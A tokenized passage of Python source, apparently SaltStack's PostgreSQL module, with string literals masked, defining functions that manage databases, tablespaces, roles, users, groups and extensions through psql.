query = '<STR_LIT>' . format ( name ) <EOL> with_args = salt . utils . odict . OrderedDict ( { <EOL> '<STR_LIT>' : owner and '<STR_LIT>' . format ( owner ) , <EOL> '<STR_LIT>' : template , <EOL> '<STR_LIT>' : encoding and '<STR_LIT>' . format ( encoding ) , <EOL> '<STR_LIT>' : lc_collate and '<STR_LIT>' . format ( lc_collate ) , <EOL> '<STR_LIT>' : lc_ctype and '<STR_LIT>' . format ( lc_ctype ) , <EOL> '<STR_LIT>' : tablespace , <EOL> } ) <EOL> with_chunks = [ ] <EOL> for key , value in with_args . items ( ) : <EOL> if value is not None : <EOL> with_chunks += [ key , '<STR_LIT:=>' , value ] <EOL> if with_chunks : <EOL> with_chunks . insert ( <NUM_LIT:0> , '<STR_LIT>' ) <EOL> query += '<STR_LIT:U+0020>' . join ( with_chunks ) <EOL> ret = _psql_prepare_and_run ( [ '<STR_LIT:-c>' , query ] , <EOL> user = user , host = host , port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , runas = runas ) <EOL> return ret [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> def db_alter ( name , user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , tablespace = None , owner = None , owner_recurse = False , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> if not any ( ( tablespace , owner ) ) : <EOL> return True <EOL> if owner and owner_recurse : <EOL> ret = owner_to ( name , owner , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> password = password , <EOL> runas = runas ) <EOL> else : <EOL> queries = [ ] <EOL> if owner : <EOL> queries . append ( '<STR_LIT>' . format ( <EOL> name , owner <EOL> ) ) <EOL> if tablespace : <EOL> queries . append ( '<STR_LIT>' . format ( <EOL> name , tablespace <EOL> ) ) <EOL> for query in queries : <EOL> ret = _psql_prepare_and_run ( [ '<STR_LIT:-c>' , query ] , <EOL> user = user , host = host , port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , runas = runas ) <EOL> if ret [ '<STR_LIT>' ] != <NUM_LIT:0> : <EOL> return False <EOL> return True <EOL> def db_remove ( name , user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , runas = None ) : <EOL> '''<STR_LIT>''' <EOL> query = '<STR_LIT>' . format ( name ) <EOL> ret = _psql_prepare_and_run ( [ '<STR_LIT:-c>' , query ] , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> runas = runas , <EOL> maintenance_db = maintenance_db , <EOL> password = password ) <EOL> return ret [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> def tablespace_list ( user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , runas = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> query = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> rows = __salt__ [ '<STR_LIT>' ] ( query , runas = runas , host = host , <EOL> user = user , port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password ) <EOL> for row in rows : <EOL> ret [ row [ '<STR_LIT:Name>' ] ] = row <EOL> ret [ row [ '<STR_LIT:Name>' ] ] . pop ( '<STR_LIT:Name>' ) <EOL> return ret <EOL> def tablespace_exists ( name , user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , runas = None ) : <EOL> '''<STR_LIT>''' <EOL> tablespaces = tablespace_list ( user = user , host = host , port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , runas = runas ) <EOL> return name in tablespaces <EOL> def tablespace_create ( name , location , options = None , owner = None , user = None , <EOL> host = None , port = None , maintenance_db = None , password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> owner_query = '<STR_LIT>' <EOL> options_query = '<STR_LIT>' <EOL> if owner : <EOL> owner_query = '<STR_LIT>' . format ( owner ) <EOL> if options : <EOL> optionstext = [ '<STR_LIT>' . format ( k , v ) for k , v in options . items ( ) ] <EOL> options_query = '<STR_LIT>' . format ( '<STR_LIT:U+002CU+0020>' . join ( optionstext ) ) <EOL> query = '<STR_LIT>' . format ( name , <EOL> owner_query , <EOL> location , <EOL> options_query ) <EOL> ret = _psql_prepare_and_run ( [ '<STR_LIT:-c>' , query ] , <EOL> user = user , host = host , port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , runas = runas ) <EOL> return ret [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> def tablespace_alter ( name , user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , new_name = None , new_owner = None , <EOL> set_option = None , reset_option = None , runas = None ) : <EOL> '''<STR_LIT>''' <EOL> if not any ( [ new_name , new_owner , set_option , reset_option ] ) : <EOL> return True <EOL> queries = [ ] <EOL> if new_name : <EOL> queries . append ( '<STR_LIT>' . format ( <EOL> name , new_name ) ) <EOL> if new_owner : <EOL> queries . append ( '<STR_LIT>' . format ( <EOL> name , new_owner ) ) <EOL> if set_option : <EOL> queries . append ( '<STR_LIT>' . format ( <EOL> name , set_option . keys ( ) [ <NUM_LIT:0> ] , set_option . values ( ) [ <NUM_LIT:0> ] ) ) <EOL> if reset_option : <EOL> queries . append ( '<STR_LIT>' . format ( <EOL> name , reset_option ) ) <EOL> for query in queries : <EOL> ret = _psql_prepare_and_run ( [ '<STR_LIT:-c>' , query ] , <EOL> user = user , host = host , port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , runas = runas ) <EOL> if ret [ '<STR_LIT>' ] != <NUM_LIT:0> : <EOL> return False <EOL> return True <EOL> def tablespace_remove ( name , user = None , host = None , port = None , <EOL> maintenance_db = None , password = None , runas = None ) : <EOL> '''<STR_LIT>''' <EOL> query = '<STR_LIT>' . format ( name ) <EOL> ret = _psql_prepare_and_run ( [ '<STR_LIT:-c>' , query ] , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> runas = runas , <EOL> maintenance_db = maintenance_db , <EOL> password = password ) <EOL> return ret [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> def user_list ( user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , runas = None , return_password = False ) : <EOL> '''<STR_LIT>''' <EOL> ret = { } <EOL> ver = _parsed_version ( user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) <EOL> if ver : <EOL> if ver >= distutils . version . LooseVersion ( '<STR_LIT>' ) : <EOL> replication_column = '<STR_LIT>' <EOL> else : <EOL> replication_column = '<STR_LIT>' <EOL> if ver >= distutils . version . LooseVersion ( '<STR_LIT>' ) : <EOL> rolcatupdate_column = '<STR_LIT>' <EOL> else : <EOL> rolcatupdate_column = '<STR_LIT>' <EOL> else : <EOL> log . error ( '<STR_LIT>' ) <EOL> return False <EOL> _x = lambda s : s if return_password else '<STR_LIT>' <EOL> query = ( '<STR_LIT>' . join ( [ <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> , _x ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' <EOL> , _x ( '<STR_LIT>' ) <EOL> , _x ( '<STR_LIT>' ) <EOL> ] ) . format ( rolcatupdate_column , replication_column ) ) <EOL> rows = psql_query ( query , <EOL> runas = runas , <EOL> host = host , <EOL> user = user , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password ) <EOL> def get_bool ( rowdict , key ) : <EOL> '''<STR_LIT>''' <EOL> if rowdict [ key ] == '<STR_LIT:t>' : <EOL> return True <EOL> elif rowdict [ key ] == '<STR_LIT:f>' : <EOL> return False <EOL> else : <EOL> return None <EOL> for row in rows : <EOL> retrow = { } <EOL> for key in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> retrow [ key ] = get_bool ( row , key ) <EOL> for date_key in ( '<STR_LIT>' , ) : <EOL> try : <EOL> retrow [ date_key ] = datetime . datetime . strptime ( <EOL> row [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> except ( ValueError , KeyError ) : <EOL> retrow [ date_key ] = None <EOL> retrow [ '<STR_LIT>' ] = row [ '<STR_LIT>' ] <EOL> if return_password : <EOL> retrow [ '<STR_LIT:password>' ] = row [ '<STR_LIT:password>' ] <EOL> ret [ row [ '<STR_LIT:name>' ] ] = retrow <EOL> for role in six . iterkeys ( ret ) : <EOL> rdata = ret [ role ] <EOL> groups = rdata . setdefault ( '<STR_LIT>' , [ ] ) <EOL> query = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) . format ( role ) <EOL> try : <EOL> rows = psql_query ( query , <EOL> runas = runas , <EOL> host = host , <EOL> user = user , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password ) <EOL> for row in rows : <EOL> if row [ '<STR_LIT>' ] not in groups : <EOL> groups . append ( row [ '<STR_LIT>' ] ) <EOL> except Exception : <EOL> continue <EOL> return ret <EOL> def role_get ( name , user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , runas = None , return_password = False ) : <EOL> '''<STR_LIT>''' <EOL> all_users = user_list ( user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas , <EOL> return_password = return_password ) <EOL> try : <EOL> return all_users . get ( name , None ) <EOL> except AttributeError : <EOL> log . error ( '<STR_LIT>' ) <EOL> return None <EOL> def user_exists ( name , <EOL> user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> return bool ( <EOL> role_get ( name , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas , <EOL> return_password = False ) ) <EOL> def _add_role_flag ( string , <EOL> test , <EOL> flag , <EOL> cond = None , <EOL> prefix = '<STR_LIT>' , <EOL> addtxt = '<STR_LIT>' , <EOL> skip = False ) : <EOL> if not skip : <EOL> if cond is None : <EOL> cond = test <EOL> if test is not None : <EOL> if cond : <EOL> string = '<STR_LIT>' . format ( string , flag ) <EOL> else : <EOL> string = '<STR_LIT>' . format ( string , flag , prefix ) <EOL> if addtxt : <EOL> string = '<STR_LIT>' . format ( string , addtxt ) <EOL> return string <EOL> def _maybe_encrypt_password ( role , <EOL> password , <EOL> encrypted = _DEFAULT_PASSWORDS_ENCRYPTION ) : <EOL> '''<STR_LIT>''' <EOL> if password is not None : <EOL> password = str ( password ) <EOL> if encrypted and password and not password . startswith ( '<STR_LIT>' ) : <EOL> password = "<STR_LIT>" . format ( <EOL> hashlib . md5 ( salt . utils . to_bytes ( '<STR_LIT>' . format ( password , role ) ) ) . hexdigest ( ) ) <EOL> return password <EOL> def _role_cmd_args ( name , <EOL> sub_cmd = '<STR_LIT>' , <EOL> typ_ = '<STR_LIT>' , <EOL> encrypted = None , <EOL> login = None , <EOL> connlimit = None , <EOL> inherit = None , <EOL> createdb = None , <EOL> createuser = None , <EOL> createroles = None , <EOL> superuser = None , <EOL> groups = None , <EOL> replication = None , <EOL> rolepassword = None , <EOL> db_role = None ) : <EOL> if createuser is not None and superuser is None : <EOL> superuser = createuser <EOL> if inherit is None : <EOL> if typ_ in [ '<STR_LIT:user>' , '<STR_LIT>' ] : <EOL> inherit = True <EOL> if login is None : <EOL> if typ_ == '<STR_LIT:user>' : <EOL> login = True <EOL> if typ_ == '<STR_LIT>' : <EOL> login = False <EOL> if encrypted is None : <EOL> encrypted = _DEFAULT_PASSWORDS_ENCRYPTION <EOL> skip_passwd = False <EOL> escaped_password = '<STR_LIT>' <EOL> if not ( <EOL> rolepassword is not None <EOL> and ( <EOL> isinstance ( rolepassword , six . string_types ) and bool ( rolepassword ) <EOL> ) <EOL> or ( <EOL> isinstance ( rolepassword , bool ) <EOL> ) <EOL> ) : <EOL> skip_passwd = True <EOL> if isinstance ( rolepassword , six . string_types ) and bool ( rolepassword ) : <EOL> escaped_password = '<STR_LIT>' . format ( <EOL> _maybe_encrypt_password ( name , <EOL> rolepassword . replace ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> encrypted = encrypted ) ) <EOL> skip_superuser = False <EOL> if bool ( db_role ) and bool ( superuser ) == bool ( db_role [ '<STR_LIT>' ] ) : <EOL> skip_superuser = True <EOL> flags = ( <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:test>' : inherit } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:test>' : createdb } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:test>' : createroles } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:test>' : superuser , <EOL> '<STR_LIT>' : skip_superuser } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:test>' : replication } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:test>' : login } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:test>' : bool ( connlimit ) , <EOL> '<STR_LIT>' : str ( connlimit ) , <EOL> '<STR_LIT>' : connlimit is None } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:test>' : ( encrypted is not None and bool ( rolepassword ) ) , <EOL> '<STR_LIT>' : skip_passwd or isinstance ( rolepassword , bool ) , <EOL> '<STR_LIT>' : encrypted , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:test>' : bool ( rolepassword ) , <EOL> '<STR_LIT>' : skip_passwd , <EOL> '<STR_LIT>' : escaped_password } , <EOL> ) <EOL> for data in flags : <EOL> sub_cmd = _add_role_flag ( sub_cmd , ** data ) <EOL> if sub_cmd . endswith ( '<STR_LIT>' ) : <EOL> sub_cmd = sub_cmd . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if groups : <EOL> if isinstance ( groups , list ) : <EOL> groups = '<STR_LIT:U+002C>' . join ( groups ) <EOL> for group in groups . split ( '<STR_LIT:U+002C>' ) : <EOL> sub_cmd = '<STR_LIT>' . format ( sub_cmd , group , name ) <EOL> return sub_cmd <EOL> def _role_create ( name , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> createdb = None , <EOL> createroles = None , <EOL> createuser = None , <EOL> encrypted = None , <EOL> superuser = None , <EOL> login = None , <EOL> connlimit = None , <EOL> inherit = None , <EOL> replication = None , <EOL> rolepassword = None , <EOL> typ_ = '<STR_LIT>' , <EOL> groups = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> if user_exists ( name , user , host , port , maintenance_db , <EOL> password = password , runas = runas ) : <EOL> log . info ( '<STR_LIT>' . format ( typ_ . capitalize ( ) , name ) ) <EOL> return False <EOL> sub_cmd = '<STR_LIT>' . format ( name ) <EOL> sub_cmd = '<STR_LIT>' . format ( sub_cmd , _role_cmd_args ( <EOL> name , <EOL> typ_ = typ_ , <EOL> encrypted = encrypted , <EOL> login = login , <EOL> connlimit = connlimit , <EOL> inherit = inherit , <EOL> createdb = createdb , <EOL> createroles = createroles , <EOL> createuser = createuser , <EOL> superuser = superuser , <EOL> groups = groups , <EOL> replication = replication , <EOL> rolepassword = rolepassword <EOL> ) ) <EOL> ret = _psql_prepare_and_run ( [ '<STR_LIT:-c>' , sub_cmd ] , <EOL> runas = runas , host = host , user = user , port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password ) <EOL> return ret [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> def user_create ( username , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> createdb = None , <EOL> createuser = None , <EOL> createroles = None , <EOL> inherit = None , <EOL> login = None , <EOL> connlimit = None , <EOL> encrypted = None , <EOL> superuser = None , <EOL> replication = None , <EOL> rolepassword = None , <EOL> groups = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> return _role_create ( username , <EOL> typ_ = '<STR_LIT:user>' , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> createdb = createdb , <EOL> createuser = createuser , <EOL> createroles = createroles , <EOL> inherit = inherit , <EOL> login = login , <EOL> connlimit = connlimit , <EOL> encrypted = encrypted , <EOL> superuser = superuser , <EOL> replication = replication , <EOL> rolepassword = rolepassword , <EOL> groups = groups , <EOL> runas = runas ) <EOL> def _role_update ( name , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> createdb = None , <EOL> createuser = None , <EOL> typ_ = '<STR_LIT>' , <EOL> createroles = None , <EOL> inherit = None , <EOL> login = None , <EOL> connlimit = None , <EOL> encrypted = None , <EOL> superuser = None , <EOL> replication = None , <EOL> rolepassword = None , <EOL> groups = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> role = role_get ( name , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas , <EOL> return_password = False ) <EOL> if not bool ( role ) : <EOL> log . info ( <EOL> '<STR_LIT>' . format ( typ_ . capitalize ( ) , name ) <EOL> ) <EOL> return False <EOL> sub_cmd = '<STR_LIT>' . format ( name ) <EOL> sub_cmd = '<STR_LIT>' . format ( sub_cmd , _role_cmd_args ( <EOL> name , <EOL> encrypted = encrypted , <EOL> login = login , <EOL> connlimit = connlimit , <EOL> inherit = inherit , <EOL> createdb = createdb , <EOL> createuser = createuser , <EOL> createroles = createroles , <EOL> superuser = superuser , <EOL> groups = groups , <EOL> replication = replication , <EOL> rolepassword = rolepassword , <EOL> db_role = role <EOL> ) ) <EOL> ret = _psql_prepare_and_run ( [ '<STR_LIT:-c>' , sub_cmd ] , <EOL> runas = runas , host = host , user = user , port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password ) <EOL> return ret [ '<STR_LIT>' ] == <NUM_LIT:0> <EOL> def user_update ( username , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> createdb = None , <EOL> createuser = None , <EOL> createroles = None , <EOL> encrypted = None , <EOL> superuser = None , <EOL> inherit = None , <EOL> login = None , <EOL> connlimit = None , <EOL> replication = None , <EOL> rolepassword = None , <EOL> groups = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> return _role_update ( username , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> typ_ = '<STR_LIT:user>' , <EOL> inherit = inherit , <EOL> login = login , <EOL> connlimit = connlimit , <EOL> createdb = createdb , <EOL> createuser = createuser , <EOL> createroles = createroles , <EOL> encrypted = encrypted , <EOL> superuser = superuser , <EOL> replication = replication , <EOL> rolepassword = rolepassword , <EOL> groups = groups , <EOL> runas = runas ) <EOL> def _role_remove ( name , user = None , host = None , port = None , maintenance_db = None , <EOL> password = None , runas = None ) : <EOL> '''<STR_LIT>''' <EOL> if not user_exists ( name , user , host , port , maintenance_db , <EOL> password = password , runas = runas ) : <EOL> log . info ( '<STR_LIT>' . format ( name ) ) <EOL> return False <EOL> sub_cmd = '<STR_LIT>' . format ( name ) <EOL> _psql_prepare_and_run ( <EOL> [ '<STR_LIT:-c>' , sub_cmd ] , <EOL> runas = runas , host = host , user = user , port = port , <EOL> maintenance_db = maintenance_db , password = password ) <EOL> if not user_exists ( name , user , host , port , maintenance_db , <EOL> password = password , runas = runas ) : <EOL> return True <EOL> else : <EOL> log . info ( '<STR_LIT>' . format ( name ) ) <EOL> return False <EOL> def available_extensions ( user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> exts = [ ] <EOL> query = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> ret = psql_query ( query , user = user , host = host , port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , runas = runas ) <EOL> exts = { } <EOL> for row in ret : <EOL> if '<STR_LIT>' in row and '<STR_LIT:name>' in row : <EOL> exts [ row [ '<STR_LIT:name>' ] ] = row <EOL> return exts <EOL> def installed_extensions ( user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> exts = [ ] <EOL> query = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> ret = psql_query ( query , user = user , host = host , port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , runas = runas ) <EOL> exts = { } <EOL> for row in ret : <EOL> if '<STR_LIT>' in row and '<STR_LIT>' in row : <EOL> exts [ row [ '<STR_LIT>' ] ] = row <EOL> return exts <EOL> def get_available_extension ( name , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> return available_extensions ( user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) . get ( name , None ) <EOL> def get_installed_extension ( name , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> return installed_extensions ( user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) . get ( name , None ) <EOL> def is_available_extension ( name , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> exts = available_extensions ( user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) <EOL> if name . lower ( ) in [ <EOL> a . lower ( ) <EOL> for a in exts <EOL> ] : <EOL> return True <EOL> return False <EOL> def _pg_is_older_ext_ver ( a , b ) : <EOL> '''<STR_LIT>''' <EOL> return a < b <EOL> def is_installed_extension ( name , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> installed_ext = get_installed_extension ( <EOL> name , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) <EOL> return bool ( installed_ext ) <EOL> def create_metadata ( name , <EOL> ext_version = None , <EOL> schema = None , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> installed_ext = get_installed_extension ( <EOL> name , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) <EOL> ret = [ _EXTENSION_NOT_INSTALLED ] <EOL> if installed_ext : <EOL> ret = [ _EXTENSION_INSTALLED ] <EOL> if ( <EOL> ext_version is not None <EOL> and _pg_is_older_ext_ver ( <EOL> installed_ext . get ( '<STR_LIT>' , ext_version ) , <EOL> ext_version <EOL> ) <EOL> ) : <EOL> ret . append ( _EXTENSION_TO_UPGRADE ) <EOL> if ( <EOL> schema is not None <EOL> and installed_ext . get ( '<STR_LIT>' , '<STR_LIT:f>' ) == '<STR_LIT:t>' <EOL> and installed_ext . get ( '<STR_LIT>' , schema ) != schema <EOL> ) : <EOL> ret . append ( _EXTENSION_TO_MOVE ) <EOL> return ret <EOL> def drop_extension ( name , <EOL> if_exists = None , <EOL> restrict = None , <EOL> cascade = None , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> if cascade is None : <EOL> cascade = True <EOL> if if_exists is None : <EOL> if_exists = False <EOL> if restrict is None : <EOL> restrict = False <EOL> args = [ '<STR_LIT>' ] <EOL> if if_exists : <EOL> args . append ( '<STR_LIT>' ) <EOL> args . append ( name ) <EOL> if cascade : <EOL> args . append ( '<STR_LIT>' ) <EOL> if restrict : <EOL> args . append ( '<STR_LIT>' ) <EOL> args . append ( '<STR_LIT:;>' ) <EOL> cmd = '<STR_LIT:U+0020>' . join ( args ) <EOL> if is_installed_extension ( name , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) : <EOL> _psql_prepare_and_run ( <EOL> [ '<STR_LIT:-c>' , cmd ] , <EOL> runas = runas , host = host , user = user , port = port , <EOL> maintenance_db = maintenance_db , password = password ) <EOL> ret = not is_installed_extension ( name , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) <EOL> if not ret : <EOL> log . info ( '<STR_LIT>' . format ( name ) ) <EOL> return ret <EOL> def create_extension ( name , <EOL> if_not_exists = None , <EOL> schema = None , <EOL> ext_version = None , <EOL> from_version = None , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> if if_not_exists is None : <EOL> if_not_exists = True <EOL> mtdata = create_metadata ( name , <EOL> ext_version = ext_version , <EOL> schema = schema , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) <EOL> installed = _EXTENSION_NOT_INSTALLED not in mtdata <EOL> installable = is_available_extension ( name , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) <EOL> if installable : <EOL> if not installed : <EOL> args = [ '<STR_LIT>' ] <EOL> if if_not_exists : <EOL> args . append ( '<STR_LIT>' ) <EOL> args . append ( '<STR_LIT>' . format ( name ) ) <EOL> sargs = [ ] <EOL> if schema : <EOL> sargs . append ( '<STR_LIT>' . format ( schema ) ) <EOL> if ext_version : <EOL> sargs . append ( '<STR_LIT>' . format ( ext_version ) ) <EOL> if from_version : <EOL> sargs . append ( '<STR_LIT>' . format ( from_version ) ) <EOL> if sargs : <EOL> args . append ( '<STR_LIT>' ) <EOL> args . extend ( sargs ) <EOL> args . append ( '<STR_LIT:;>' ) <EOL> cmd = '<STR_LIT:U+0020>' . join ( args ) . strip ( ) <EOL> else : <EOL> args = [ ] <EOL> if schema and _EXTENSION_TO_MOVE in mtdata : <EOL> args . append ( '<STR_LIT>' . format ( <EOL> name , schema ) ) <EOL> if ext_version and _EXTENSION_TO_UPGRADE in mtdata : <EOL> args . append ( '<STR_LIT>' . format ( <EOL> name , ext_version ) ) <EOL> cmd = '<STR_LIT:U+0020>' . join ( args ) . strip ( ) <EOL> if cmd : <EOL> _psql_prepare_and_run ( <EOL> [ '<STR_LIT:-c>' , cmd ] , <EOL> runas = runas , host = host , user = user , port = port , <EOL> maintenance_db = maintenance_db , password = password ) <EOL> mtdata = create_metadata ( name , <EOL> ext_version = ext_version , <EOL> schema = schema , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) <EOL> ret = True <EOL> for i in _EXTENSION_FLAGS : <EOL> if ( i in mtdata ) and ( i != _EXTENSION_INSTALLED ) : <EOL> ret = False <EOL> if not ret : <EOL> log . info ( '<STR_LIT>' . format ( name ) ) <EOL> return ret <EOL> def user_remove ( username , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> return _role_remove ( username , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> runas = runas ) <EOL> def group_create ( groupname , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> createdb = None , <EOL> createuser = None , <EOL> createroles = None , <EOL> encrypted = None , <EOL> login = None , <EOL> inherit = None , <EOL> superuser = None , <EOL> replication = None , <EOL> rolepassword = None , <EOL> groups = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> return _role_create ( groupname , <EOL> user = user , <EOL> typ_ = '<STR_LIT>' , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> createdb = createdb , <EOL> createroles = createroles , <EOL> createuser = createuser , <EOL> encrypted = encrypted , <EOL> login = login , <EOL> inherit = inherit , <EOL> superuser = superuser , <EOL> replication = replication , <EOL> rolepassword = rolepassword , <EOL> groups = groups , <EOL> runas = runas ) <EOL> def group_update ( groupname , <EOL> user = None , <EOL> host = None , <EOL> port = None , <EOL> maintenance_db = None , <EOL> password = None , <EOL> createdb = None , <EOL> createroles = None , <EOL> createuser = None , <EOL> encrypted = None , <EOL> inherit = None , <EOL> login = None , <EOL> superuser = None , <EOL> replication = None , <EOL> rolepassword = None , <EOL> groups = None , <EOL> runas = None ) : <EOL> '''<STR_LIT>''' <EOL> return _role_update ( groupname , <EOL> user = user , <EOL> host = host , <EOL> port = port , <EOL> maintenance_db = maintenance_db , <EOL> password = password , <EOL> createdb = createdb , <EOL> typ_ = 